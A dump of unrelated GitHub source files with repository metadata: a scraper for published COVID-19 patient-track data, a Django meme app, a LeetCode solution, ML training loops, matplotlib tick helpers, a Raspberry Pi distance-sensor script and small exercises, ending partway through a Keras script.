伪装请求头\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',\n 'referer': 'https://news.qq.com/zt2020/page/feiyan.htm?from=timeline&isappinstalled=0'\n}\nrequests.packages.urllib3.disable_warnings()\n\n\nclass MongoDBPipeline(object):\n\n def __init__(self):\n self.clinet = pymongo.MongoClient(\"localhost\", 27017)\n # self.clinet = pymongo.MongoClient(\"106.12.56.213\", 27017)\n db = self.clinet[\"nCoV_pTrack\"]\n self.db = db\n\n def insert_data(self, tb_name, new_dict, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n tb.insert_one(new_dict)\n\n def insert_many(self, tb_name, new_data, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n new_dict = None\n if isinstance(new_data, list):\n new_dict = dict()\n for _data in new_data:\n new_dict[_data['_id']] = _data\n tb.insert_many(new_dict)\n\n def search(self, tb_name, search_query, fields=None, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n show_query = None\n if fields is not None:\n show_query = dict()\n for field in fields:\n show_query[field] = 1\n data = []\n for line in tb.find(search_query, show_query):\n one_data = dict()\n for key in line.keys():\n one_data[key] = line[key]\n data.append(one_data)\n return data\n\n def update_data(self, tb_name, _id, new_dict, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n tb.update_one({'_id': _id}, {'$set': new_dict})\n\n def update_many(self, tb_name, filter, new_dict, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n tb.update(filter, {'$set': new_dict}, upsert=True)\n\n\ndef query_patent_track(citycode, page, size=100):\n query_url = \"https://iflow-api.uc.cn/feiyan/track?page={}&size={}&citycode={}\".\\\n format(str(page), str(size), citycode)\n try:\n res = requests.get(query_url, verify=False, headers=headers, timeout=60000)\n obj = res.json()\n tracks = obj['data']['trackes']\n if len(tracks) < 1:\n return None\n return tracks\n except:\n print(\"error in city: %s, page: %d\" %(citycode, page))\n return None\n\n\ndef get_save_city_tracks(city, mongo, tb, df, size=100):\n if 'citycode' not in city:\n return\n try:\n sure_cnt = int(city['sure_cnt'])\n except:\n sure_cnt = 1000000\n for page in range(0, sure_cnt):\n tracks = query_patent_track(city['citycode'], page, size=size)\n if tracks is None:\n break\n # 保存进DataFrame (csv准备)\n for track in tracks:\n try:\n df.loc[len(df)] = track\n except:\n print(\"add to csv DataFrame error: \" + str(track))\n try:\n if 'id' in track:\n track['_id'] = track['province'] + \"-\" + track['city'] + '-' + str(track['id'])\n else:\n track['_id'] = track['province'] + \"-\" + track['city'] + '-' + str(track['index'])\n except:\n if \"id\" in track:\n track['_id'] = track[\"id\"]\n try:\n mongo.insert_data(tb, track, db=\"nCoV_pTrack\")\n except:\n print(\"insert mongo error: \" + str(track))\n # 写入mongodb\n # mongo.insert_many(tb, tracks, db=\"nCoV_pTrack\")\n time.sleep(random.randint(1, 4))\n if len(tracks) < size:\n print(\"city of %s collected...\" %city['citycode'])\n break\n\n\ndef get_one_tracker_set():\n pipeline = MongoDBPipeline()\n time_str = time.strftime(\"%m%d-%H%M\", time.localtime())\n tb_name = time_str\n csv_path = \"tracks_\" + time_str + \".csv\"\n\n pre_url = \"https://iflow-api.uc.cn/feiyan/track?page=0&size=10&city=1&citycode=340800\"\n requests.adapters.DEFAULT_RETRIES = 5\n pre_res = requests.get(pre_url, verify=False, headers=headers, timeout=60000)\n pre_json = pre_res.json()\n cities = pre_json['data']['cities']\n for city in cities:\n try:\n _id = city['one_level_area'] + \"_\" + city['two_level_area']\n city['_id'] = _id\n except:\n print(\"error in pre_processing:\" + str(city))\n # 各市疫情总体信息存储在MongoDb中\n pipeline.insert_data(\"cities\", {\"_id\": time_str, \"cities\": cities}, db=\"nCoV_pTrack\")\n df = pd.DataFrame(columns=['id', 'province', 'city', 'index', 'source',\n 'base_info', 'detail_info', 'is_from_outside'])\n # 开始抓取每个市的患者轨迹数据\n for city in cities:\n get_save_city_tracks(city, pipeline, tb_name, df, size=100)\n\n df.to_csv(csv_path, encoding='utf-8', header=True, index=False)\n print(\"save trakers ok.\")\n\n\nif __name__ == '__main__':\n for i in range(365):\n get_one_tracker_set()\n time.sleep(86190)\n","repo_name":"HgS318/nCoV2019","sub_path":"patient_tracker/patient_tracker.py","file_name":"patient_tracker.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3538916437","text":"from django.shortcuts import render, redirect\n# from django.http import Http404\nfrom django.contrib.auth import login\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Meme, User\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\nimport uuid\nimport boto3\n\nS3_BASE_URL = 'https://s3.us-west-1.amazonaws.com/'\nBUCKET = 'memeworld'\n\n# Create your views here.\n\ndef home(request):\n\n return render(request, 'home.html')\n\n\ndef search(request):\n if str(request)[39:-2] == 'do+a+barrel+roll':\n return render(request, 'memes/barrelroll.html')\n try:\n user = User.objects.get(username=str(request)[39:-2])\n return redirect(f'/memes/user/{user.id}')\n except:\n return redirect('/memes/')\n\n\ndef memes_index(request):\n memes = Meme.objects.all()\n return render(request, 'memes/index.html', {'memes': memes})\n\n\ndef signup(request):\n error_message = ''\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('home')\n else:\n error_message = 'Invalid sign up - try again'\n form = UserCreationForm()\n context = {'form': form, 'error_message': error_message}\n return render(request, 'registration/signup.html', context)\n\n\n@login_required\ndef user_view(request):\n user = request.user\n memes = Meme.objects.filter(user=request.user)\n return render(request, 'memes/user.html', {'memes': memes, 'username': user})\n\n\ndef user_id(request, user_id):\n user = User.objects.get(id=user_id).username\n memes = Meme.objects.filter(user=user_id)\n return render(request, 'memes/user.html', {'memes': memes, 'username': user})\n\n\nclass MemeCreate(LoginRequiredMixin, CreateView):\n model = Meme\n fields = ['photo_URL', 'top_text', 'bottom_text', 'face',\n 'text_color', 'font', 'font_size', 'font_background_color']\n success_url = '/memes/user/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n photo_file = self.request.FILES.get('photo-file', None)\n if photo_file:\n s3 = boto3.client('s3')\n # need a unique \"key\" for S3 / needs image file extension too\n key = uuid.uuid4().hex[:6] + \\\n photo_file.name[photo_file.name.rfind('.'):]\n # just in case something goes wrong\n try:\n s3.upload_fileobj(photo_file, BUCKET, key)\n # build the full url string\n url = f\"{S3_BASE_URL}{BUCKET}/{key}\"\n form.instance.photo_URL = url\n except:\n print('An error occurred uploading file to S3')\n return super().form_valid(form)\n\n\nclass MemeUpdate(LoginRequiredMixin, UpdateView):\n model = Meme\n fields = ['top_text', 'bottom_text', 'face',\n 'text_color', 'font', 'font_size', 'font_background_color']\n success_url = '/memes/user/'\n\n def form_valid(self, form):\n if form.instance.user == self.request.user:\n return super().form_valid(form)\n else:\n return redirect('/memes/user/')\n\n\nclass MemeDelete(LoginRequiredMixin, DeleteView):\n model = Meme\n success_url = '/memes/user/'\n\n\n@login_required\ndef like(request, meme_id):\n meme = Meme.objects.get(id=meme_id)\n meme.likes.add(request.user.id)\n meme.save()\n return redirect(request.META.get('HTTP_REFERER', '/memes/'))\n","repo_name":"Aclap427/Meme_World","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14031379860","text":"'''\n\n 977. Squares of a Sorted Array\n \n'''\n\nclass Solution:\n \n '''\n\n Time Complexity:\n O(n) to iterate through all numbers\n \n Space Complexity\n O(n) to store all squared nums and result.\n \n '''\n \n def sortedSquares(self, nums):\n squared = list(map(lambda x: x*x, nums))\n \n n = len(nums)\n result = [0] * n\n curr = n - 1\n L, R = 0, n - 1\n \n while L <= R:\n if squared[L] > squared[R]:\n result[curr] = squared[L]\n L += 1\n else:\n result[curr] = squared[R]\n R -= 1\n \n curr -= 1\n \n return result\n \n \n \ndef runSolution():\n solution = Solution()\n print(solution.sortedSquares(nums = [-4,-1,0,3,10]))\n print(solution.sortedSquares(nums = [-7,-3,2,3,11]))\n pass\nrunSolution()\n","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"Arrays&Hashing/SquaresOfASortedArray.py","file_name":"SquaresOfASortedArray.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19775148559","text":"import random\n\nimport numpy as np\nimport torch\nfrom torch.nn.utils import clip_grad_norm_\nimport torch.optim as optim\nfrom tqdm import tqdm\n\nfrom spanparser.data import create_dataset\nfrom spanparser.metadata import Metadata\nfrom spanparser.model import create_model\nfrom spanparser.utils import Stats, try_gpu\n\n\nclass Experiment(object):\n\n def __init__(self, config, outputter, load_prefix=None, seed=None):\n self.config = config\n if seed is not None:\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n self.outputter = outputter\n self.meta = Metadata(config)\n if load_prefix:\n self.load_metadata(load_prefix)\n self.dataset = create_dataset(self.config, self.meta)\n self.create_model()\n if load_prefix:\n self.load_model(load_prefix)\n else:\n self.model.initialize(self.config, self.meta)\n\n def close(self):\n pass\n\n def create_model(self):\n config = self.config\n self.model = create_model(config, self.meta)\n self.model = try_gpu(self.model)\n self.optimizer = optim.Adam(self.model.parameters(),\n lr=config.train.learning_rate,\n weight_decay=config.train.l2_reg)\n\n def load_metadata(self, prefix):\n print('Loading metadata from {}.meta'.format(prefix))\n self.meta.load(prefix + '.meta')\n\n def load_model(self, prefix):\n print('Loading model from {}.model'.format(prefix))\n state_dict = torch.load(prefix + '.model')\n self.model.load_state_dict(state_dict)\n\n ################################\n # Train loop\n\n def train(self):\n config = self.config\n max_epochs = config.timing.max_epochs\n save_every = config.timing.save_every\n eval_every = config.timing.eval_every\n\n train_stats = Stats()\n\n # Initial save\n if save_every > 0:\n self.outputter.save_model(self.meta.epoch, self.model, self.meta)\n\n progress_bar = tqdm(total=max_epochs, desc='TRAIN')\n\n while self.meta.epoch < max_epochs:\n self.meta.epoch += 1\n progress_bar.update()\n \n self.dataset.init_iter('train')\n for train_batch in tqdm(self.dataset.get_iter('train'), desc='TRAIN'):\n stats = self.process_batch(train_batch, train=True)\n train_stats.add(stats)\n print('TRAIN @ {}: {}'.format(self.meta.epoch, train_stats))\n train_stats.log(self.outputter.tb_logger, self.meta.epoch, 'pn_train_')\n train_stats = Stats()\n\n if save_every > 0 and self.meta.epoch % save_every == 0:\n # Save the model\n self.outputter.save_model(self.meta.epoch, self.model, self.meta)\n\n if self.meta.epoch % eval_every == 0:\n # Evaluate\n dev_stats = Stats()\n self.dataset.init_iter('dev')\n fout_filename = 'pred.dev.{}'.format(self.meta.epoch)\n with open(self.outputter.get_path(fout_filename), 'w') as fout:\n for dev_batch in tqdm(self.dataset.get_iter('dev'), desc='DEV'):\n stats = self.process_batch(dev_batch, train=False, fout=fout)\n dev_stats.add(stats)\n print('DEV @ {}: {}'.format(self.meta.epoch, dev_stats))\n dev_stats.log(self.outputter.tb_logger, self.meta.epoch, 'pn_dev_')\n self.meta.update_acc(dev_stats.accuracy / dev_stats.n)\n\n progress_bar.close()\n\n def test(self):\n test_stats = Stats()\n self.dataset.init_iter('test')\n fout_filename = 'pred.test.{}'.format(self.meta.epoch)\n with open(self.outputter.get_path(fout_filename), 'w') as fout:\n for test_batch in tqdm(self.dataset.get_iter('test'), desc='TEST'):\n stats = self.process_batch(test_batch, train=False, fout=fout)\n test_stats.add(stats)\n print('TEST @ {}: {}'.format(self.meta.epoch, test_stats))\n test_stats.log(self.outputter.tb_logger, self.meta.epoch, 'pn_test_')\n\n\n ################################\n # Processing a batch\n\n def process_batch(self, batch, train=False, fout=None):\n \"\"\"\n Process a batch of examples.\n\n Args:\n batch (list[???])\n train (bool): Whether it is training or testing\n fout (file): Dump predictions to this file\n Returns:\n a Stats containing the model's statistics\n \"\"\"\n stats = Stats()\n # Initialize the model\n if train:\n self.optimizer.zero_grad()\n self.model.train()\n else:\n self.model.eval()\n # Forward pass\n logit = self.model(batch)\n loss = self.model.get_loss(logit, batch)\n mean_loss = loss / len(batch)\n stats.n = len(batch)\n stats.loss = float(mean_loss)\n # Evaluate\n predictions = self.model.get_pred(logit, batch)\n self.dataset.evaluate(batch, predictions, stats, fout)\n # Gradient\n if train and mean_loss.requires_grad:\n mean_loss.backward()\n stats.grad_norm = clip_grad_norm_(\n self.model.parameters(),\n self.config.train.gradient_clip\n )\n self.optimizer.step()\n return stats\n","repo_name":"ppasupat/factored-span-parsing","sub_path":"spanparser/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"35437221580","text":"#!usr/bin/env python \n# -*- coding:utf-8\n\nimport re \nimport json\n\ninput = \"jawiki-country.json/jawiki-country.json\"\noutput = \"jawiki-england.txt\"\n\nf = open(input, \"r\")\no = open(output, \"w\")\n\nfor line in f:\n doc = json.loads(line)\n\n if re.search(u\"イギリス\", doc[u\"title\"]):\n o.write(doc[u\"text\"])\no.close()\nf.close()","repo_name":"Toshiki-Sasaki/NLP100","sub_path":"chapter3/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"43263806321","text":"import nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nimport numpy as np\nimport random\nimport pickle\nfrom collections import Counter\n\nlemmatizer = WordNetLemmatizer()\ntotal_lines = 10000000\n\n\ndef create_lexicon(pos_file, neg_file):\n lexicon = []\n for file in [pos_file, neg_file]:\n with open(file, 'r') as f:\n lines = f.readlines()\n for line in lines[:total_lines]:\n words = word_tokenize(line.lower())\n lexicon += list(words)\n\n lexicon = [lemmatizer.lemmatize(lex) for lex in lexicon]\n word_counts = Counter(lexicon)\n # word_counts = {\"word1\":1000, \"word2\":500, ...}\n\n lexicon2 = []\n for word in word_counts:\n # No common words and no least appearing words\n if 1000 > word_counts[word] > 50:\n lexicon2.append(word)\n\n return lexicon2\n\n\ndef sample_handling(sample, lexicon, classification):\n data = []\n # [\n # [[1,0,1,1,0],[0,1]],[[0,1,0,1,0],[1,0]],..\n # ]\n # [0, 1] - negative, [1, 0] - positive\n\n with open(sample, 'r') as f:\n lines = f.readlines()\n for line in lines[:total_lines]:\n words = word_tokenize(line.lower())\n words = [lemmatizer.lemmatize(word) for word in words]\n features = np.zeros(len(lexicon))\n for word in words:\n if word.lower() in lexicon:\n index = lexicon.index(word.lower())\n features[index] += 1\n features = list(features)\n data.append([features, classification])\n\n return data\n\n\ndef create_data(pos, neg, test_size=0.1):\n lexicon = create_lexicon(pos, neg)\n data = []\n data += sample_handling(pos, lexicon, [1, 0])\n data += sample_handling(neg, lexicon, [0, 1])\n random.shuffle(data)\n\n data = np.array(data)\n number_of_validation_instances = int(test_size * len(data))\n\n train_X = list(data[:, 0][:-number_of_validation_instances])\n train_Y = list(data[:, 1][:-number_of_validation_instances])\n validation_X = list(data[:, 0][-number_of_validation_instances:])\n validation_Y = list(data[:, 1][-number_of_validation_instances:])\n\n return train_X, validation_X, train_Y, validation_Y\n\n\nif __name__ == '__main__':\n train_X, validation_X, train_Y, validation_Y = create_data('../data/pos.txt', '../data/neg.txt')\n with open('sentiment_data.pkl', 'wb') as f:\n pickle.dump([train_X, validation_X, train_Y, validation_Y], f)\n","repo_name":"omkaracharya/Tutorials","sub_path":"Tensorflow/NeuralNets/sentiment_features.py","file_name":"sentiment_features.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19737897374","text":"import mpl_toolkits.axisartist as AA\nfrom mpl_toolkits.axes_grid1 import host_subplot\n\nimport math\nfrom datetime import tzinfo, timedelta, date, datetime\nimport timezones as tz\nimport logging as l\nfrom numpy import min, max\n\n# TODO: get rid of rogue docstrings!!! and maybe add good ones?\n\ndef init_axis(rows, cols, i, twin=False):\n\t# this creates axes with the axes artist loaded\n\tax = host_subplot(rows, cols, i) # ,axes_class=AA.Axes)\n\tif twin:\n\t\t# the twin axis will create a second X and Y axis on the top and the left!\n\t\treturn ax, ax.twin()\n\telse:\n\t\treturn ax\ndef init_axis_gs (gs, twin=False, sharex=False):\n\tif not sharex:\n\t\tax = host_subplot(gs, axes_class=AA.Axes)\n\telse:\n\t\tax = host_subplot(gs, axes_class=AA.Axes, sharex=sharex)\n\tif twin:\n\t\treturn ax, ax.twin()\n\telse:\n\t\treturn ax\n\n\"\"\" the tt functions allow you to call a tiemzone specific function, without having to import tzinfo\"\"\"\ndef ttUTC(begin, end=False, **kwargs):\n\t_tt(begin, end, tz.utcTZ(), **kwargs)\n\ndef ttMST(begin, end=False, **kwargs):\n\t_tt(begin, end, tz.mstTZ(), **kwargs)\n\ndef _tt(begin, end=False, userTZ=tz.utcTZ(), ax=None, xy='x',\n\tmajor_count=5., minor_count=6., nodates=False, plt=False, notext=False,\n\tlabel=False, focus_hour=12, **kwargs):\n\t'''\n\tcreate time ticks\n\t'''\n\tif not end:\n\t\t'we can accept simply a list of times, and take the first and last values'\n\t\tend = begin[-1]\n\t\tbegin = begin[0]\n\t'determine the gaps'\n\tduration = float(end - begin)\n\tnative_dt = duration / (major_count - 1.)\n\t'So, figure out where this is closest to'\n\tif not ax and not plt:\n\t\tl.warning('tt: No axis instance (ax) or plt specified!')\n\t\treturn False\n\n\tdef alg(dt):\n\t\t# the dt is a multiple of this many hours, an algoritm\n\t\tif dt < 3 * 3600:\n\t\t\t'1,2,3'\n\t\t\treturn 3600\n\t\telif dt < 18 * 3600:\n\t\t\t'6,9,12,15,18'\n\t\t\treturn 3 * 3600\n\t\telif dt < 36 * 3600:\n\t\t\t'24,30,36'\n\t\t\treturn 6 * 3600\n\t\telif dt < 192 * 3600:\n\t\t\treturn 12 * 3600\n\t\t\t'48,60,72,84,96,...'\n\t\telse:\n\t\t\treturn 24 * 3600\n\t\t\t'some range of integer days'\n\n\tif native_dt < 3600:\n\t\t'''\n\t\tif to make major_count-1 segments is less than an hour, then simply\n\t\tmake major_count segments.\n\t\t'''\n\t\tdt = duration / major_count\n\telse:\n\t\tcount = 100.\n\t\tdt = 0 # lets the functions act more purely?\n\t\twhile count > major_count:\n\t\t\tdt += alg(native_dt)\n\t\t\tcount = duration / dt\n\t'Not perfect, but it will do for now...'\n\tif dt % (24 * 6) == 0:\n\t\t# then we are working with dt > 6 days:\n\t\t# find the minor_dt which gives minor_count or one more integer days\n\t\t# days = dt / 24 # number of days per major tick\n\n\t\tminor_dt = 24 * 3600 # for now. #FIXME - BANDAID SOLUTION!\n\telse:\n\t\tminor_dt = dt / minor_count\n\t'''\n\tI could add more logic to this computation, but I cannot figure out a good\n\tway to actually make anything better.\n\t'''\n\n\t'now find the ticks'\n\t'determine if the date should be shown or not'\n\tst = datetime.fromtimestamp(begin, tz=userTZ)\n\ten = datetime.fromtimestamp(end, tz=userTZ)\n\tincl_dates = False\n\tincl_times = True\n\tif duration > 86400 or not st.day == en.day: incl_dates = True\n\n\t'''\n\tDetermine tick beginning time. The logic here will be that\n\tif there is a whole hour within 1/3 of a dt range, then start there\n\t\n\tif dt > 192 hours, then we are looking for a 00 hour\n\t'''\n\tstart = begin\n\n\tshift_st = datetime.fromtimestamp(begin + dt / 3, tz=userTZ)\n\t# if the hour is a multiple of 3, and minute 0, then skip this\n\tif dt > 192 * 3600:\n\t\t# do the >24 hour business\n\t\tl.debug('tt: computing integer date timestamps')\n\t\t# fix minutes\n\t\tif st.minute > 0:\n\t\t\tstart += (59 - st.minute) * 60 + 60 - st.second\n\t\t# recompute the start time object\n\t\tst = datetime.fromtimestamp(start, tz=userTZ)\n\t\t# now just shift to the next time the hour is 0\n\t\t# focus_hour is 12 by default, picking midday to indicate.\n\t\t# but it might be more properly 12.\n\t\tif not focus_hour:\n\t\t\tfocus_hour = 0\n\t\twhile not st.hour == focus_hour:\n\t\t\tstart += 3600.\n\t\t\tst = datetime.fromtimestamp(start, tz=userTZ)\n\t\tincl_times = False\n\telif not shift_st.hour == st.hour and not (st.minute == 0 and st.hour % 3 == 0):\n\t\tl.debug('computing start time shift, data: ' + str(st.hour) + ' m: ' + str(st.minute))\n\t\t# 'We have determined that within the first third of a bin, there is an hour change'\n\t\t# 'shift this thing to the next full hour'\n\t\tif st.minute > 0:\n\t\t\tstart += (59 - st.minute) * 60 + 60 - st.second\n\t\t# 'THEN! if dt is > 4 hours, then find the nearest multiple of 3'\n\t\tif dt > 4 * 3600:\n\t\t\tshift_st = datetime.fromtimestamp(start, tz=userTZ)\n\t\t\twhile not shift_st.hour % 3 == 0:\n\t\t\t\tstart += 3600\n\t\t\t\tshift_st = datetime.fromtimestamp(start, tz=userTZ)\n\n\n\tt = start\n\ttimes = []\n\ttexts = []\n\n\t# make major ticks\n\tif nodates:\n\t\t# catch the nodates correction\n\t\tincl_dates = False\n\twhile t <= end + dt:\n\t\ttimes.append(t)\n\t\t# determine the relevant text\n\t\tdtobj = datetime.fromtimestamp(t, tz=userTZ)\n\t\tt += dt\n\t\tif notext:\n\t\t\ttexts.append('')\n\t\telif incl_dates and incl_times:\n\t\t\ttexts.append(dtobj.strftime('%H:%M\\n%d %b %Y'))\n\t\telif incl_times:\n\t\t\ttexts.append(dtobj.strftime('%H:%M'))\n\t\telse:\n\t\t\ttexts.append(dtobj.strftime('%d %b %Y'))\n\n\n\t# 'make minor ticks'\n\tt = start - dt\n\tminor_times = []\n\twhile t < end + dt:\n\t\tminor_times.append(t)\n\t\tt += minor_dt\n\t'and draw the actual ticks'\n\tif plt:\n\t\t'if a plt key is passed, then that supercedes the ax key passed.'\n\t\tax = plt.gca()\n\tcustomTick(ax, xy, times, texts, minor=minor_times)\n\n\tif xy == 'x':\n\t\t# some special things can be done when this is on the x axis\n\t\t# note, none of this is special to the x-x=axis\n\t\tif max(times) > end:\n\t\t\tend = max(times)\n\t\t# set the limit so the last tick actually gets plotted.\n\t\tax.set_xlim((begin - 1, end + 1))\n\n\t\t# if text is being made, then apply the label to the axis\n\t\tif not notext:\n\t\t\taxis_label = 'Time (' + userTZ.tzname(False) + ')'\n\t\t\tif not incl_dates:\n\t\t\t\t# then no dates are shown because there is only one date in the fig\n\t\t\t\taxis_label += ' on ' + st.strftime('%d %b %Y')\n\t\t\tif label:\n\t\t\t\taxis_label += ' ' + label\n\t\t\tax.set_xlabel(axis_label)\n\n\ndef tick(axis, interval, minor=False):\n\t# perform a dirty import of the tick library\n\timport matplotlib.ticker as tk\n\tfmt = tk.FormatStrFormatter('%i')\n\tloc = tk.MultipleLocator(base=interval)\n\t# now set!\n\taxis.set_major_formatter(fmt)\n\taxis.set_major_locator(loc)\n\tif minor:\n\t\tminor = tk.MultipleLocator(base=minor)\n\t\taxis.set_minor_locator(minor)\n\ndef no_ticks(plt, xy='x'):\n\tif xy == 'x':\n\t\tplt.gca().get_xaxis().set_ticks([])\n\telse:\n\t\tplt.gca().get_yaxis().set_ticks([])\n\t'NOTE, this may not remove labels...'\n\ndef customTick(ax, xy, vals, labels, minor=False):\n\tif xy == 'x':\n\t\tax.set_xticks(vals)\n\t\tax.set_xticklabels(labels)\n\t\tif minor:\n\t\t\tax.set_xticks(minor, minor=True)\n\telse:\n\t\tax.set_yticks(vals)\n\t\tax.set_yticklabels(labels)\n\t\tif minor:\n\t\t\tax.set_yticks(minor, minor=True)\n\ndef label_x(ax, label):\n\tax.set_xlabel(label)\n\ndef label_y(ax, label):\n\tax.set_ylabel(label)\n\n\n# colorbar!!!\ndef colbar_ceilometer(fig, data):\n\tfig.colorbar(data, **{\n\t\t'orientation':'horizontal',\n\t\t'fraction':0.04,\n\t\t'pad':0.1,\n\t\t# 'format':tk.FormatStrFormatter(r\"%1.1f\\linebreak$\\displaystyle m^{-1}$sr^{-1}$\"),\n\t\t'aspect':40,\n\t\t'drawedges':False\n\t})\n\ndef fig_size(fig, x, y):\n\tfig.set_size_inches(x, y)\n\ndef ep2num(num):\n\treturn num\n\ndef tick_labels(list, userTZ=tz.mstTZ(), nodates='auto', notimes='auto'):\n\t'''\n\tReturn a list of labels for a given list of times, following our rules above.\n\t\n\ta utility for when the algorithms used previously are not sufficient\n\tlist, is the list of times\n\tnodates specifies if the date will be in the text (default is auto, if a day changes, then yes)\n\tnotimes specifies if the time should not be shown, (default is auto, always show time)\n\t'''\n\tlx = max(list)\n\tln = min(list)\n\tdt = lx - ln\n\tst = datetime.fromtimestamp(ln, tz=userTZ)\n\ten = datetime.fromtimestamp(lx, tz=userTZ)\n\tif nodates == 'auto':\n\t\tif dt > 86400 or not st.day == en.day:\n\t\t\t# show dates!\n\t\t\tnodates = False\n\t\telse:\n\t\t\tnodates = True\n\tif notimes == 'auto':\n\t\tnotimes = False\n\n\tout = []\n\tif nodates and notimes:\n\t\treturn out * len(list)\n\ti = 0\n\tfor t in list:\n\n\t\tdtobj = datetime.fromtimestamp(t, tz=userTZ)\n\t\tif not nodates and not notimes:\n\t\t\tout.append(dtobj.strftime('%H:%M\\n%d %b %Y'))\n\t\telif nodates:\n\t\t\tout.append(dtobj.strftime('%H:%M'))\n\t\telse:\n\t\t\tout.append(dtobj.strftime('%d %b %Y'))\n\treturn out\n","repo_name":"joeyoun9/cleanfig","sub_path":"cleanfig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"354661214","text":"import RPi.GPIO as GPIO\nimport time\n \nTRIGGER_PIN = 25\nECHO_PIN = 8\n \nGPIO.setmode(GPIO.BCM)\nGPIO.setup(TRIGGER_PIN, GPIO.OUT)\nGPIO.setup(ECHO_PIN, GPIO.IN)\n \nGPIO.output(TRIGGER_PIN, GPIO.LOW)\ntime.sleep(1)\n \ntry:\n print('Ctrl-C')\n while True:\n GPIO.output(TRIGGER_PIN, GPIO.HIGH)\n time.sleep(0.00001)\n GPIO.output(TRIGGER_PIN, GPIO.LOW)\n while GPIO.input(ECHO_PIN) == 0:\n start_time = time.time()\n while GPIO.input(ECHO_PIN) == 1:\n end_time = time.time()\n etime = end_time - start_time\n distance = 17150 * etime\n print('{:.1f}'.format(distance))\n time.sleep(5)\nexcept KeyboardInterrupt:\n print('closeapp')\nfinally:\n GPIO.cleanup()\n","repo_name":"ryanwu1717/SmartLibraryGuidanceRobotandAssistant-","sub_path":"hc_sr04_raw.py","file_name":"hc_sr04_raw.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28206178926","text":"'''\n题目:一个5位数,判断它是不是回文数。\n'''\n\nnum = str(int(input('输入数字:')))\n\n# 判断是否为回文\ndef palindrome(s):\n for i in range(len(s) // 2):\n if s[i] != s[-i - 1]:\n return False\n return True\n\n\nprint('是否为回文数:', palindrome(num))\n","repo_name":"woider/PythonExercise","sub_path":"case_20/sub_30.py","file_name":"sub_30.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"zh","doc_type":"code","stars":444,"dataset":"github-code","pt":"40"} +{"seq_id":"6690773446","text":"from django.urls import include, path\nfrom django.views.generic import TemplateView\nfrom rest_framework import routers\nfrom rest_framework.schemas import get_schema_view\n\nfrom game.views import MinesweeperGameViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'minesweeper', MinesweeperGameViewSet, basename='minesweeper')\n\nurlpatterns = [\n path('api/', include(router.urls)),\n path('openapi/', get_schema_view(\n title=\"Your Project\",\n description=\"API for all things …\",\n version=\"1.0.0\"\n ), name='openapi-schema'),\n path('swagger-ui/', TemplateView.as_view(\n template_name='swagger-ui.html',\n extra_context={'schema_url': 'openapi-schema'}\n ), name='swagger-ui'),\n]\n","repo_name":"juanlanuzag/minesweeper","sub_path":"back/minesweeper/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27299952902","text":"import numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Activation\nfrom keras.layers.core import Dense\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping\n\nprint(\"\\n\")\nprint(\"#\"*5, end = '')\nprint(\"TRAINING MODEL\", end='')\nprint(\"#\"*5)\nprint(\"\\n\")\n\ndef getModel(inputShape):\n #Defining model\n model = Sequential()\n model.add(Dense(32, input_shape = [inputShape,], activation = 'relu'))\n model.add(Dense(32, activation = 'relu'))\n model.add(Dense(32, activation = 'relu'))\n model.add(Dense(32, activation = 'relu'))\n model.add(Dense(1, activation = 'relu'))\n model.summary()\n return model\n#Defining callbacks\ncallbacks = [\n EarlyStopping(monitor='loss', patience=3, verbose = 0)]\n\n#Function reference for standardizing\nscaler = StandardScaler()\n\nPATH_LIST = ['../../../datasets/Positionwise/centre_backs.csv', '../../../datasets/Positionwise/free_roamers.csv',\n '../../../datasets/Positionwise/full_backs.csv', 